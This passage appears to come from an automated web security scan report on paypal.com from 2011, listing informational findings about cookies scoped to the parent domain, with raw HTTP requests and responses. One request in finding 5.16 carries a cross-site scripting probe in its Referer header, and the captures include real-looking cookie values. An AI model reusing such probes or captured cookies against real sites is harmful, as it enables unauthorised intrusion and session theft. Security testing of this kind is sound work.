Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=A_M2c43mxbS3NKLjnOOSKt5BOWrvkjLOz0vwmVoI2XtBpW9ewJkBkmenqC-iIi-uwz-FMX1ufsocEFkcI4jq1o_0IvO89uWGWt9zz8i153mLpq8wlO9ACTHBmnw4K8L21YljCLmo8iv9zR6IBJ10klTGc_XUlsNuIyyUsz8sGBg8GK0KINDjyhZcNnAfWX6D6mZ_juRr55l2SjmVC06N32YR4hgDDSmaSpWjXA2rEjDT4IPUjPa7dlPb19NQeIKK4W8TxCFtR_GyczGwNLTMaxtX8vNcxgEwrV_7wwdaOvaVNSTIWDDK9A-FjSn3XPEnzQbtDHaCKU4VV5N5fgz_fTAxPi7Ws83k-vX-dQ2liJHNynrfyaowPx3dq0_DbSQ5f8Hx2os_FYK-KAbHNMiSB9CIG2OKchBry1NlSMRTjCAfeqhDwQsVpHvbppiaXf8PtQ8S7FZcGFV8qlllIR2l77ZNmaaBJAq5hjrmApChC4zuS4cGRPQ9rjAkBjOJQVMKZGDBI31ZVbk1c-FuGpOKzdK3kO_gcQatho4bp3EEVlGY9UaIUgv9UvFx6__M18C7qsqFSBIgU2pnL8uLX8FtUOTlIVD3VuYNu7YnKXiK3-TNmVCnYikYfBmWHlPseg4KITl15m; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:20 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Location: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=AnPdalCcSGOrdzjFzkLVNrBLerKiaHBFkNP9RjWNLNcx8RDfmZWVWHQ-Jp4&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html
Content-Length: 0

5.10. https://www.paypal.com/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/searchscr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/searchscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.11. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_login-run; domain=.paypal.com; path=/; Secure; HttpOnly
cwrClyrK4LoCV1fydGbAxiNL6iG=yYHKat1b2bdfWWzVl7sMExYgVP2e3kDJS3z1gTajBzDoQNNh3OjK-k4vNLjqYwAmv7DuXn6iqiXgx42wKn79d2MNsue4zirvudkutaV4aor5WmJs_Q6TEjl1wbQyfCt09THCD0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313114143; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2010%20_login-run%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2014%20Login%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/webscr?cmd=_login-run HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

5.12. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_upgrade-interest-marcom; domain=.paypal.com; path=/; Secure; HttpOnly
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=CzR4D18pRWB4T-AHWcsONgX47MNu_8md9Zxi7fY6KUFBjHDPgxRKVvRIbXjd41k0mClxW3OZ8KB9UZljbBzwrjPcjSKmvqsmGuU1dIckcR5AfV0kUrW0aSaqRdAZd1uGTXze7rhRVVAb6B5uFq_5QDn0FKVzaRDuole1p49SU5N7gbZbEY7lQQ46CCEvbcc-9ibfBzgkHj4LPDl0zcoeKIGZ3W_ES2MHnqJvm8zvs-3cgJj7SOzzPbHXjGsuYoEDZwE2KOHtq_mzl3i0z_RnHsl6qZsKDfNuPxCssDZekfznrtwcVb_OeYCq2YD9tVmszj5svjT_eu7hylyZ7VyoPot1W4x9ityAFRhfj2bJnZ24IMT5BJtjaknzGibF7Ok5Zp5z4NOh_dMUCdaMxM5yE-82JS8m2PsOo-nujGbkb3aUHY-n2EPs9sua94Zjt-t1CaRvj9T5Q1PSBGJZIEOXMtepQmkAGBZsLRCEknzTTtcbv0tBWCPHm38u4-PCdXgPv6ZEFAAkiLvdKnx4FN3Ts-Oxm2llgh6GnMtMf0bCX-fXlcmROOQU1vidv3GJ2aXLP17cucV3KMuF3WZoCxClQmngOWdlg0M74Z0iPzG79BBxTIYrOwa85sY6Jogir3FVf6Q8A0; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2024%20_upgrade-interest-marcom%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2034%20xpt%2fCustomer%2ffunds%2fSystemDownError%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2029%20Enrollment%20is%20closed%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/webscr?cmd=_upgrade-interest-marcom&outside=1 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.13. https://www.paypal.com/express-checkout-buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/express-checkout-buttons

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2055%20xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2055%20xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2039%20Express%20Checkout%20-%20Button%20Code%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /express-checkout-buttons HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.14. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /helpcenter/main.jsp HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.15. https://www.paypal.com/security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/security

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_security-center-outside; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:48:41 GMT
Server: Apache
Set-Cookie: navcmd=_security-center-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:42 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Location: https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/online_security_center
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

5.16. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_pro-nonpro-welcome; domain=.paypal.com; path=/; Secure; HttpOnly
cookie_welcome=welcome; domain=.paypal.com; path=/; Secure; HttpOnly
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=1im-YfGZhWOoT-EoG8FpMRJBWDw3-uxNvgUoGsAB2ksuCoudKnT5Nm7ifaZ6W-T3LqtrSC38Vu25Jc4JYworPC6Q2Oiy4nSeRZ4r-wmldDwgswwPAH9JrOCiZE4eps2F0yoiQAdasGrI1qlDcTTfLbhUD3C33_Y4obA4KKWTyeWOOUDgPYzkL7GGBgpm_quBWrmGlXHRKzt5i8IX_l4clsbs-cqIlI10Fw89NOwfRWNe5WjqhuSz5ybuLaoS3wyHngTTIuLUiRH0uMOMyHoVnO30tO6uaMtA-FnKZN8hj36VigyJbT-7Kd1enrPTxeGThqDhpisClYqov-qvPLNR5LXOPic0_a_gwP72S_qGi6e-NYpXyLvW1zq7_cGJ7DORMh3z0s7nSQA-rf0lvflhjj2Oo3pcR0B9hMiXNYk6TZVnbr4NfzrBZ0eLfbVvztwh5LobEEg_0yRBFmrWnUmxD2Sk2e2wfPE197K57c08cq58WhjJ; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/?cmd=_pro-nonpro-welcome HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/webapps/mpp/merchant?cb963%22-alert(document.cookie)-%22c89faa687fb=1
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_render-content%26content_ID%3dmerchant%2fhome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8

Response

HTTP/1.1 302 Found
Date: Fri, 12 Aug 2011 14:58:17 GMT
Server: Apache
Set-Cookie: navcmd=_pro-nonpro-welcome; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_welcome=welcome; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=1im-YfGZhWOoT-EoG8FpMRJBWDw3-uxNvgUoGsAB2ksuCoudKnT5Nm7ifaZ6W-T3LqtrSC38Vu25Jc4JYworPC6Q2Oiy4nSeRZ4r-wmldDwgswwPAH9JrOCiZE4eps2F0yoiQAdasGrI1qlDcTTfLbhUD3C33_Y4obA4KKWTyeWOOUDgPYzkL7GGBgpm_quBWrmGlXHRKzt5i8IX_l4clsbs-cqIlI10Fw89NOwfRWNe5WjqhuSz5ybuLaoS3wyHngTTIuLUiRH0uMOMyHoVnO30tO6uaMtA-FnKZN8hj36VigyJbT-7Kd1enrPTxeGThqDhpisClYqov-qvPLNR5LXOPic0_a_gwP72S_qGi6e-NYpXyLvW1zq7_cGJ7DORMh3z0s7nSQA-rf0lvflhjj2Oo3pcR0B9hMiXNYk6TZVnbr4NfzrBZ0eLfbVvztwh5LobEEg_0yRBFmrWnUmxD2Sk2e2wfPE197K57c08cq58WhjJ; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 14:58:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Location: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=hpJAagQCRW2VdTe7pAfFY09Zo8FQVczju-NsLQtxrA_PEMz5x6bR16rrhki&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 0

5.17. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_login-run; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2010%20_login-run%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2014%20Login%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/?cmd=_login-run HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://cms.paypal.com/us/cgi-bin/?cmd=_render-content&content_ID=security/report_problem
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_home-general; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

5.18. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
cwrClyrK4LoCV1fydGbAxiNL6iG=r8jrAA0cX4Huuekz8b3KsLceEQ-CI32oWFiYPcxQz5PAxbn1pj9zEu5_YWJKcLI-FZm5jP7RCNTPn9pOIxaHakZ1Oy75k9JizPSSZ68lBJwb8strQM0NRo1nyCz0B4GmZVMVaG%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156898; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/helpscr?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.19. https://www.paypal.com/us/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpweb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cgi-bin/helpweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.20. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
cwrClyrK4LoCV1fydGbAxiNL6iG=HTWyqqr-HLb-Wsjq9R9pnHkZJpG0FU95IAOmS5LNpOH4zXNDS1POHVSOTy8r2IQSjBa6krvSz0DAKL5XcGRB2dyNW31BPdzzegbjKgYKzvpb3d9y9iq4ag3KugN6kzDfgeXgQm%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156905; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/marketingweb?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.21. https://www.paypal.com/us/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/searchscr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cgi-bin/searchscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.22. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_send-money-transfer; domain=.paypal.com; path=/; Secure; HttpOnly
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GiU6xb6uUqmEY7WNSEyBQtkIgp_LIh4AwHkmkEjCcoebsrKV-EHex7giKPrq06CWhDgVEwQsSfQXC1unRUZuCzE9_Mb98BDvJntpHMwEgkmo2oiXXRGxyZ9Uf_2OA3tHM7fp-xPCOds-dwqIx36B5uKtGdkCfPZVvMljV9uMGCuDNsCMh8XUS8TZ4Y_b7fXLZ50Lv4DuGNOemoAqTb44Rf5sUDYwgEEmyMLfrTUlsdd4gc4Y7Dja2qDgI8je6Ay7mIbyqk2nbgRm5HLc5VRSkeAKkNbdpLyd24nJV3s2nvtSDFKj1hY4R8HJtN5PYQuDbKNj1lr1r2xqs4mut2r9QKiECLPNtmNRD7uj1lAZ6AgVpyB5u5mV9qnXWr7dgQJJVBtfv8odlPfTf5W__h2NFu02TK5NwQFfwOW6l69EvJBuQVRFUoHFcHBst38JoqdUBBWvanIclLNBnCq1bhlFz_Z0XuHRHL7-GwF29iZ9hH0J6FBr1xjrro7OlWJh051YqsXh_NTGctnXXUxewLTJ91QHghXs0oXUc2_ntNK8dfY_8L59OdLzcvUQYEhMHIjFX-mYqsTjF9buP7r8IbK1LdpzC1MSgRzx2dEajZeaz-_m0wQhx_PUU3tND3PqDDb2UJygYG; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/cgi-bin/webscr?cmd=_send-money-transfer&send_method=domestic&nav=0.2 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 12 Aug 2011 13:47:35 GMT
Server: Apache
Set-Cookie: navcmd=_send-money-transfer; domain=.paypal.com; path=/; Secure; HttpOnly
